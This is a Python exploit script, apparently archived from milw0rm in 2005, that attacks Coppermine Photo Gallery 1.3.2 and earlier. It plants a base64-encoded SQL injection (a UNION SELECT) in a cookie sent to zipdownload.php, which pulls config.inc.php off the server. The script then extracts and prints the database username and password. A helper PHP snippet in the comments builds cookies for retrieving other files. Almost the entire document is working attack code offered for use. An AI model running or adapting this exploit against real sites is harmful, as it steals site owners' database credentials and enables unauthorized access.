Coppermine Photo Gallery <= 1.3.2 File Retrieval SQL Injection Exploit

                                                # tested and approved /str0ke

#CPG Exploit
#File Retrieval by SQL Injection.
#By Default this exploit get the config.inc.php file which
#contains the db user/pass
#If you want to get another file you need to have the good cookie
#you can use this phpscript to get good cookie :
##<?
##$tab[]=$_GET['inj'];
##$val=base64_encode(serialize($tab));
##echo $val;
##?>
#
#By DiGiTAL_MiDWAY


import urllib2, sys
from urllib import urlencode
import zipfile

if(len(sys.argv)<2):
    print 'usage : %s http://host/Path/ tableprefix[default : cpg132_ for v1.3.1 use cpg1d_]' % sys.argv[0]
    sys.exit(0)
site=sys.argv[1]
try:
    prefix=sys.argv[2]
except:
    prefix='cpg132_'

print '''File Retrieval by SQL Injection for Coppermine Photo Gallery v<=1.3.2
                   by DiGiTAL_MiDWAY [[email protected]]'''

cook='YToxOntpOjA7czo1MToiJycpIFVOSU9OIFNFTEVDVCAnLi4vaW5jbHVkZS8nLCAnY29uZmlnLmluYy5waHAnIC8qIjt9'
# '') UNION SELECT filepath,file /*

req=urllib2.Request(site+'zipdownload.php')
req.add_header('Cookie', urlencode({prefix+'fav' : cook}))

zip=open('test.zip', 'wb')
print '[+]Opening WebPage'
try:
    f=urllib2.urlopen(req).read()
except:
    print '[+]Failed to opening website', sys.exc_info()
    sys.exit(0)
zip.write(f)
zip.close()
monzip=zipfile.ZipFile('test.zip', 'r')
try:
    conf=monzip.read('config.inc.php')
except:
    print '[+]Exploit failed....'
    sys.exit(0)
monzip.close()
conf=conf[conf.find("$CONFIG['dbuser'] =")+len("$CONFIG['dbuser'] ="):]
conf=conf[conf.find("'")+1:]
user=conf[:conf.find("'")]
conf=conf[conf.find("$CONFIG['dbpass'] =")+len("$CONFIG['dbpass'] ="):]
conf=conf[conf.find("'")+1:]
passwd=conf[:conf.find("'")]
print '[+]Exploit Succeed'
print '[+]User :', user, 'Pass :', passwd

# milw0rm.com [2005-11-13]